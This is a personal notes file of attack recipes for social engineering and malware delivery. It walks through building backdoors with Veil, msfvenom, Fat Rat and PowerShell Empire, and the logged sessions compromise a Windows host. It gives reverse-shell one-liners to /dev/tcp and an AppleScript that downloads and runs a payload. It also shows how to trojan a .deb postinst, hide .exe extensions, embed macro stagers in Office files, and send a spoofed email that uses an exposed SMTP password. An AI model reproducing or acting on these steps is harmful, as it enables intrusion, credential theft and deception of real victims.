
About Social Engineering
------------------------
------------------------

"It can bypass anti-virus programs by modifying hex values"

"Use HxD software"

https://mh-nexus.de/en/hxd/

- Install HxD.
- Edit .exe virus file in HxD.
- Modify texts(Program comments) in that file.
- Test it work well or not. If not it revert back.

Tools
-----
- ZLogger (Key Logger)
- LaZagne (Password Discoverer)
- Metasploit Framework
- Powershell Empire (Back Door)
- Veil (Back Door)
- Fat Rat (Back Door)
- msfvenom (Back Door)

ZLogger
-------
> git clone zlogger_git
> cd zlogger_dir
> ls
> python zlogger.py --help
> python zlogger.py -i 60 -w -e your_email@gmail.com -p your_password -o file_name

LaZagne
-------
- Download lazagne.exe and run_lazange_exe.bat from git
- Read run_lazange_exe.bat to understand
- Send that bat file to target
- When target run that bat file it will download and execute lazagne.exe and send mail to hacker about passwords 

Veil
----
> veil
> list

===============================================================================
                             Veil | [Version]: 3.1.14
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Available Tools:
                                                                                                                          
        1)      Evasion
        2)      Ordnance

> use 1
>> list

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:                                                                                                  
                                                                                                                          
        1)      autoit/shellcode_inject/flat.py

        2)      auxiliary/coldwar_wrapper.py
        3)      auxiliary/macro_converter.py
        4)      auxiliary/pyinstaller_wrapper.py

        5)      c/meterpreter/rev_http.py
        6)      c/meterpreter/rev_http_service.py
        7)      c/meterpreter/rev_tcp.py
        8)      c/meterpreter/rev_tcp_service.py

        9)      cs/meterpreter/rev_http.py
        10)     cs/meterpreter/rev_https.py
        11)     cs/meterpreter/rev_tcp.py
        12)     cs/shellcode_inject/base64.py
        13)     cs/shellcode_inject/virtual.py

        14)     go/meterpreter/rev_http.py
        15)     go/meterpreter/rev_https.py
        16)     go/meterpreter/rev_tcp.py
        17)     go/shellcode_inject/virtual.py

        18)     lua/shellcode_inject/flat.py

        19)     perl/shellcode_inject/flat.py

        20)     powershell/meterpreter/rev_http.py
        21)     powershell/meterpreter/rev_https.py
        22)     powershell/meterpreter/rev_tcp.py
        23)     powershell/shellcode_inject/psexec_virtual.py
        24)     powershell/shellcode_inject/virtual.py

        25)     python/meterpreter/bind_tcp.py
        26)     python/meterpreter/rev_http.py
        27)     python/meterpreter/rev_https.py
        28)     python/meterpreter/rev_tcp.py
        29)     python/shellcode_inject/aes_encrypt.py
        30)     python/shellcode_inject/arc_encrypt.py
        31)     python/shellcode_inject/base64_substitution.py
        32)     python/shellcode_inject/des_encrypt.py
        33)     python/shellcode_inject/flat.py
        34)     python/shellcode_inject/letter_substitution.py
        35)     python/shellcode_inject/pidinject.py
        36)     python/shellcode_inject/stallion.py

        37)     ruby/meterpreter/rev_http.py
        38)     ruby/meterpreter/rev_https.py
        39)     ruby/meterpreter/rev_tcp.py
        40)     ruby/shellcode_inject/base64.py
        41)     ruby/shellcode_inject/flat.py 

>> use 15       

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:
                                                                                                                          
        Name:           Pure Golang Reverse HTTPS Stager
        Language:       go
        Rating:         Normal
        Description:    pure windows/meterpreter/reverse_https stager, no
                        shellcode

Payload: go/meterpreter/rev_https selected

 Required Options:
                                                                                                                          
Name                    Value           Description
----                    -----           -----------
BADMACS                 FALSE           Check for VM based MAC addresses
CLICKTRACK              X               Require X number of clicks before execution
COMPILE_TO_EXE          Y               Compile to an executable
CURSORCHECK             FALSE           Check for mouse movements
DISKSIZE                X               Check for a minimum number of gigs for hard disk
HOSTNAME                X               Optional: Required system hostname
INJECT_METHOD           Virtual         Virtual or Heap
LHOST                   your_ip_addr    IP of the Metasploit handler
LPORT                   8080            Port of the Metasploit handler
MINPROCS                X               Minimum number of running processes
PROCCHECK               FALSE           Check for active VM processes
PROCESSORS              1               Optional: Minimum number of processors
RAMCHECK                FALSE           Check for at least 3 gigs of RAM
SLEEP                   6               Optional: Sleep "Y" seconds, check if accelerated
USERNAME                X               Optional: The required user account
USERPROMPT              FALSE           Prompt user prior to injection
UTCCHECK                FALSE           Check if system uses UTC time

 Available Commands:
                                                                                                                          
        back            Go back to Veil-Evasion
        exit            Completely exit Veil
        generate        Generate the payload
        options         Show the shellcode's options
        set             Set shellcode option

>>> set LHOST your_ip_addr
>>> set LPORT 8080
>>> generate

"Oops! Before generate, set"

: reverse_https_8080

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_https
 [*] Executable written to: /var/lib/veil/output/compiled/rev_https_8080.exe
 [*] Source code written to: /var/lib/veil/output/source/rev_https_8080.go
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/rev_https_8080.rc

Hit enter to continue...

Metasploit Framework
--------------------
> msfconsole
> use exploit/multi/handler
>> show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.97.4     yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

>> set PAYLOAD windows/meterpreter/reverse_https
>> exploit

"Start apache server"

> service apache2 start

"Fat Rat can be use to hack Android devices"

Fat Rat
--------
"OKay Lets start Fat Rat"

         ____
        |    | 
        |____| 
       _|____|_       _____ _       _____     _   _____     _       
        /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_     
      .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|
     /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|  
    J  \.|'.\/ \                  
    | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--] 
     \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
     L   /|o'--'\   [--]            Version: 1.9.7           [--]
     |  /\/\/\   \  [--]          Codename: Whistle          [--]    
     J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]
     J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
     |/         /   [--]                                     [--]
       \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]  
    ____)_/\_(___\. [--] .___________________________________[--]
   (___._/  \_.___)'\_.-----------------------------------------/

  
        [01]  Create Backdoor with msfvenom
        [02]  Create Fud 100% Backdoor with Fudwin 1.0
        [03]  Create Fud Backdoor with Avoid v1.2  
        [04]  Create Fud Backdoor with backdoor-factory [embed] 
        [05]  Backdooring Original apk [Instagram, Line,etc] 
        [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent] 
        [07]  Create Backdoor For Office with Microsploit 
        [08]  Trojan Debian Package For Remote Acces [Trodebi] 
        [09]  Load/Create auto listeners                                                                                  
        [10]  Jump to msfconsole                                                                                          
        [11]  Searchsploit                                                                                                
        [12]  File Pumper [Increase Your Files Size]                                                                      
        [13]  Configure Default Lhost & Lport                                                                             
        [14]  Cleanup                                                                                                     
        [15]  Help                                                                                                        
        [16]  Credits                                                                                                     
        [17]  Exit

> 6


                                  ______    
                               .-        -. 
                              /            \         
                             |,  .-.  .-.  ,|      
                             | )(_ /  \_ )( |
                             |/     /\     \|    
                   (@_       <__    ^^    __>        
              _     ) \_______\__|IIIIII|__/____________________ 
             (_)\@8@8{}<________________________________________> 
                    )_/         \ IIIIII /                    
                   (@            --------                      
                            PwnWind Version  v1.5 
                        Pwned Windows with backdoor
                      Author : Edo Maland (Screetsec)
             Powershell Injection attacks on any Windows Platform                  

        [1]  Create a bat file+Powershell (FUD 100%)
        [2]  Create exe file with C# + Powershell (FUD 100%) 
        [3]  Create exe file with apache + Powershell (FUD 100%)
        [4]  Create exe file with C + Powershell (FUD 98 %)
        [5]  Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)                                                    
        [6]  Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)                                                    
        [7]  Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)                                               
        [8]  Create Backdoor with C to dll ( custom dll inject )                                                          
        [9]  Back to Menu 

> 1

                                                                                                                         
   +-------------------------------------------+                                                                          
   | [ 1 ] windows/shell_bind_tcp              |                                                                          
   | [ 2 ] windows/shell/reverse_tcp           |                                                                          
   | [ 3 ] windows/meterpreter/reverse_tcp     |                                                                          
   | [ 4 ] windows/meterpreter/reverse_tcp_dns |                                                                          
   | [ 5 ] windows/meterpreter/reverse_http    |                                                                          
   | [ 6 ] windows/meterpreter/reverse_https   |                                                                          
   +-------------------------------------------+  

> 6

Backdoor Saved To : /root/Fatrat_Generated/rev_https_8081.bat   

Apple Script
------------
do shell script "cd /tmp/ && curl http://pdf995.com/samples/pdf.pdf -O && open pdf.pdf;curl http://ip_address/evil-files/rev_tcp_4444.py -O && python rev_tcp_4444.py"

Pip Installer
------------
"It is use to make class file for python source code target not to see source code"

> cd /tmp/
> pip installer pyinstaller
> pyinstaller --onefile ZReporter.py

"Give ZReport to target computer"
"Run that on target computer"
"WTF! ZReporter? See https://github.com/z00z/ZReporter/blob/master/ZReporter.py"

target computer > ./ZReporter

msfvenom
---------
> msfvenom

MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

> msfvenom help
> msfvenom -l payloads

"Above command will list out payloads"

> msfvenom -p python/meterpreter/reverse_tcp --list-options
> msfvenom -p python/meterpreter/reverse_tcp LHOST=ip_address LPORT=port_number > file_name

"Open msfconsole in new terminal"

> msfconsole
> use exploit/multi/handler
>> show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.97.4     yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

>> set PAYLOAD python/meterpreter/reverse_tcp
>> set LPORT port_number
>> set LHOST ip_address
>> exploit

Powershell Empire
-----------------
> sudo su
> powershell-empire

================================================================================
 [Empire]  Post-Exploitation Framework
================================================================================
 [Version] 3.8.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
================================================================================
 This build was released exclusively for Kali Linux | https://kali.org
================================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       319 modules currently loaded

       0 listeners currently active

       0 agents currently active

> agents

"To kill agent type this (kill all)"       

> listeners
>> uselistener

dbx             http_com        http_hop        http_mapi       onedrive        
http            http_foreign    http_malleable  meterpreter     redirector

>> uselistener http
>>> info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  Name              True        http                             Name for the listener.
  Host              True        http://192.168.97.4:8080         Hostname/IP for staging.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        8080                             Port for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  StagingKey        True        7dnZ>fYum&vRSU*xH/]i!zQNj20lKGLq Staging key for initial agent negotiation.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  CertPath          False                                        Certificate path for https listeners.
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  Headers           True        Server:Microsoft-IIS/7.5         Headers for the control server.
  Cookie            False       EBmIZCnNhsDWwRQ                  Custom Cookie Name
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  SlackURL          False                                        Your Slack Incoming Webhook URL to communicate with your Slack instance.

>>> set Port 8080
>>> help

Listener Commands
=================
agents            Jump to the agents menu.
back              Go back a menu.
creds             Display/return credentials from the database.
execute           Execute the given listener module.
exit              Exit Empire.
help              Displays the help menu.
info              Display listener module options.
launcher          Generate an initial launcher for this listener.
listeners         Jump to the listeners menu.
main              Go back to the main menu.
resource          Read and execute a list of Empire commands from a file.
set               Set a listener option.
unset             Unset a listener option.

>>> execute

[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!


>>> back
>> list

[*] Active listeners:
                                                                                                                          
  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  http              http            http://192.168.97.4:8080             5/0.0

>> exit
> sudo powershell-empire

================================================================================
 [Empire]  Post-Exploitation Framework
================================================================================
 [Version] 3.8.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
================================================================================
 This build was released exclusively for Kali Linux | https://kali.org
================================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       319 modules currently loaded

       1 listeners currently active

       0 agents currently active

> listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  http              http            http://192.168.97.4:8080             5/0.0

>> exit
> sudo powershell-empire

================================================================================
 [Empire]  Post-Exploitation Framework
================================================================================
 [Version] 3.8.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
================================================================================
 This build was released exclusively for Kali Linux | https://kali.org
================================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       319 modules currently loaded

       1 listeners currently active

       0 agents currently active

> usestager

multi/bash                osx/jar                   windows/bunny             windows/launcher_xml
multi/launcher            osx/launcher              windows/csharp_exe        windows/macro
multi/macro               osx/macho                 windows/dll               windows/macroless_msword
multi/pyinstaller         osx/macro                 windows/ducky             windows/shellcode
multi/war                 osx/pkg                   windows/hta               windows/teensy
osx/applescript           osx/safari_launcher       windows/launcher_bat      windows/wmic
osx/application           osx/shellcode             windows/launcher_lnk      
osx/ducky                 osx/teensy                windows/launcher_sct      
osx/dylib                 windows/backdoorLnkMacro  windows/launcher_vbs

"For Mac OS target, use osx/applescript"
"Edit apple script in Script Editor from Mac Book and change icon"
"Add NSUIElement and set it to 1 in plist file"

"For Office Document in Mac OS target, use osx/macro"

> usestager windows/launcher_bat
>> info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for
  Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  Language         True        powershell        Language of the stager to generate.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.
  OutFile          False       /tmp/launcher.bat File to output .bat launcher to,
                                                 otherwise displayed on the screen.
  Delete           False       True              Switch. Delete .bat after running.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in
                                                 the stager code.
  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in
                                                 the stager code.
>> set Listener http
>> set OutFile /var/www/html/evil-files/powershell_empire_http_8080.bat
>> execute

[*] Stager output written out to: /var/www/html/evil-files/powershell_empire_http_8080.bat

"Run above bat file in target computer"

"The following will show in hacker's powershell-empire terminal"

[*] Sending POWERSHELL stager (stage 1) to 192.168.97.3                                                                   
[*] New agent RNBKXS3E checked in
[+] Initial agent RNBKXS3E from 192.168.97.3 now active (Slack)
[*] Sending agent (stage 2) to RNBKXS3E at 192.168.97.3

>> agents

[*] Active agents:
                                                                                                                                                           
 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
 RNBKXS3E ps 192.168.97.3    ZAWMOEHTIKE-PC    zawmoehtike-pc\zawmoeht powershell         2324   5/0.0    2021-06-06 06:28:06  http   

>> interact RNBKXS3E
>>> help

Agent Commands
==============
agents            Jump to the agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
dirlist           Tasks an agent to store the contents of a directory in the database.
download          Task an agent to download a file into the C2.
exit              Task agent to exit.
help              Displays the help menu or syntax for particular commands.
info              Display information about this agent
injectshellcode   Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs              Return jobs or kill a running job.
kill              Task an agent to kill a particular process name or ID.
killdate          Get or set an agent's killdate (01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task an agent to change the limit on lost agent detection
main              Go back to the main menu.
mimikatz          Runs Invoke-Mimikatz on the client.
psinject          Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth               Executes PTH for a CredID through Mimikatz.
reflectiveload    Task an agent to use a shell command.
rename            Rename the agent.
resource          Read and execute a list of Empire commands from a file.
revtoself         Uses credentials/tokens to revert token privileges.
sc                Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd         Execute a function in the currently imported PowerShell script.
scriptimport      Imports a PowerShell script and keeps it in memory in the agent.
searchmodule      Search Empire module names/descriptions.
shell             Task an agent to use a shell command.
shinject          Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>
sleep             Task an agent to 'sleep interval [jitter]'
spawn             Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token       Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo           Task an agent to get system information.
updatecomms       Dynamically update the agent comms to another listener
updateprofile     Update an agent connection profile.
upload            Task the C2 to upload a file into an agent.
usemodule         Use an Empire PowerShell module.
workinghours      Get or set an agent's working hours (9:00-17:00).

>>> sysinfo

Listener:         http://192.168.97.4:8080
Internal IP:      192.168.97.3
Username:         zawmoehtike-pc\zawmoehtike
Hostname:         ZAWMOEHTIKE-PC
OS:               Microsoft Windows 7 Ultimate 
High Integrity:   0
Process Name:     powershell
Process ID:       2324
Language:         powershell
Language Version: 2

--------------------------------------------------------------------------------------------------------------------------------------------

Trojan
------

"Trojan support to Key Logger, Back Door and Password Discovery Tool"

"Trojan file look normal file but it execute evil code in background (program file that support back door, key logger, password discovery)"

> Use BatToExe Converter to convert bat file to exe file to able to run silently in background
> Change that exe file icon (like pdf) by using BatToExe program (warning: image file must be ico)
> Hide exe file extension by using Characters Program in Kali Linux (eg: my‮gpj.exe)

Tools
- BatToExe Converter
- Autoit

Embedding Trojan in Legitimate Microsoft Office Files
----------------------------------------------------
- Open Powershell Empire in terminal
- Open Listener in Powershell Empire
- Open Stager in Powershell Empire
- Copy source code from stager file to macro in Microsoft Office file

> usestager
multi/bash                osx/jar                   windows/bunny             windows/launcher_xml
multi/launcher            osx/launcher              windows/csharp_exe        windows/macro
multi/macro               osx/macho                 windows/dll               windows/macroless_msword
multi/pyinstaller         osx/macro                 windows/ducky             windows/shellcode
multi/war                 osx/pkg                   windows/hta               windows/teensy
osx/applescript           osx/safari_launcher       windows/launcher_bat      windows/wmic
osx/application           osx/shellcode             windows/launcher_lnk      
osx/ducky                 osx/teensy                windows/launcher_sct      
osx/dylib                 windows/backdoorLnkMacro  windows/launcher_vbs

> usestager windows/macro
> info
Name: Macro

Description:
  Generates an office macro for Empire, compatible
  with office 97-2003, and 2007 file types.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  Language         True        powershell        Language of the stager to generate.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.
  OutFile          False                         File to output launcher to, otherwise
                                                 displayed on the screen.
  Base64           True        True              Switch. Base64 encode the output.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  SafeChecks       True        True              Switch. Checks for LittleSnitch or a
                                                 SandBox, exit the staging process if
                                                 true. Defaults to True.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass
                                                 in the stager code.
  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in
                                                 the stager code.
  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in
                                                 the stager code.
  OutlookEvasion   False       False             Include BC-Securty's Outlook Sandbox
                                                 evasion code

> set Listener http

"Above command joint between listener and stager"

> set OutFile /var/www/html/evil-files/trojan_embedded_8080
> execute

[*] Stager output written out to: /var/www/html/evil-files/trojan_embedded_8080

--------------------------------------------------------------------------------------------------------------------------------------------

Delivery Methods
----------------
----------------

Tools
- BeEf
- Setoolkit
- sendemail

Inject evil code in official linux package
------------------------------------------
Follow the Steps
> Download .deb file
> Type that command (dpkg -x package_name.deb folder_name)
> Type (ar -x package_name.deb)
> Go inside control folder and copy control, postinst(if exist) to /folder_name/DEBIAN/ and create file name postinst in /folder_name/DEBIAN/
> Write the following code in postinst

#!/bin/bash

sudo bash -i >& /dev/tcp/ip_address/8080 0>&1

> Type that command (dpkg-deb --build folder_name/)
> It will come out folder_name.deb file
> That file is back door file
> Watch from Hacker machine by typing that command (nc -vv -l -p 8080)

Send Email
----------
- Open account in sendinblue.com
- Send via terminal from Kali linux

> sendemail --help

sendemail-1.56 by Brandon Zehm <caspian@dotconf.net>

Synopsis:  sendemail -f ADDRESS [options]

  Required:
    -f ADDRESS                from (sender) email address
    * At least one recipient required via -t, -cc, or -bcc
    * Message body required via -m, STDIN, or -o message-file=FILE

  Common:
    -t ADDRESS [ADDR ...]     to email address(es)
    -u SUBJECT                message subject
    -m MESSAGE                message body
    -s SERVER[:PORT]          smtp mail relay, default is localhost:25
    -S [SENDMAIL_PATH]        use local sendmail utility (default: /usr/bin/sendmail) instead of network MTA

  Optional:
    -a   FILE [FILE ...]      file attachment(s)
    -cc  ADDRESS [ADDR ...]   cc  email address(es)
    -bcc ADDRESS [ADDR ...]   bcc email address(es)
    -xu  USERNAME             username for SMTP authentication
    -xp  PASSWORD             password for SMTP authentication

  Paranormal:
    -b BINDADDR[:PORT]        local host bind address
    -l LOGFILE                log to the specified file
    -v                        verbosity, use multiple times for greater effect
    -q                        be quiet (i.e. no STDOUT output)
    -o NAME=VALUE             advanced options, for details try: --help misc
        -o message-content-type=<auto|text|html>
        -o message-file=FILE         -o message-format=raw
        -o message-header=HEADER     -o message-charset=CHARSET
        -o reply-to=ADDRESS          -o timeout=SECONDS
        -o username=USERNAME         -o password=PASSWORD
        -o tls=<auto|yes|no>         -o fqdn=FQDN


  Help:
    --help                    the helpful overview you're reading now
    --help addressing         explain addressing and related options
    --help message            explain message body input and related options
    --help networking         explain -s, -b, etc
    --help output             explain logging and other output options
    --help misc               explain -o options, TLS, SMTP auth, and more

> sendemail -xu uchihamoee@gmail.com -xp znN4D5SbOh1HQM2t -s smtp-relay.sendinblue.com:587 -f "zuckerburg@facebook.com" -t "uchihatunn@gmail.com" -u "From Mark Zuckerburg to Zaw Moe Htike" -m "Nice to meet you" -o message-header="From: Mark Zuckerburg <zuckerburg@facebook.com>"

"You can also send mail via 000webhost.com"

"You can hack Mac OS or Linux by using pure social engineering by making them to type
the following command in their terminal
setsid bash -i >& /dev/tcp/ip_address/8080 0>&1"

> nc -h

[v1.10-46]
connect to somewhere:   nc [-options] hostname port[s] [ports] ... 
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -C                      Send CRLF as line-ending
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

> nc -vv -l -p 8080
>> id
>> ls
>> cd /tmp
>> pwd
>> curl
>> wget http://ip_address/evil-files/back_door_file
>> bash back_door_file
>> ifconfig
>> whoami

"We use WebScrapBook to fake login page"

Setoolkit
---------
> setoolkit


                      ..:::::::::..
                  ..:::aad8888888baa:::..
              .::::d:?88888888888?::8b::::.
            .:::d8888:?88888888??a888888b:::.
          .:::d8888888a8888888aa8888888888b:::.
         ::::dP::::::::88888888888::::::::Yb::::
        ::::dP:::::::::Y888888888P:::::::::Yb::::
       ::::d8:::::::::::Y8888888P:::::::::::8b::::
      .::::88::::::::::::Y88888P::::::::::::88::::.
      :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::
      :::::::Y88888888888P::|::Y88888888888P:::::::
      ::::::::::::::::888:::|:::888::::::::::::::::
      `:::::::::::::::8888888888888b::::::::::::::'
       :::::::::::::::88888888888888::::::::::::::
        :::::::::::::d88888888888888:::::::::::::
         ::::::::::::88::88::88:::88::::::::::::
          `::::::::::88::88::88:::88::::::::::'
            `::::::::88::88::P::::88::::::::'
              `::::::88::88:::::::88::::::'
                 ``:::::::::::::::::::''
                      ``:::::::::''

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
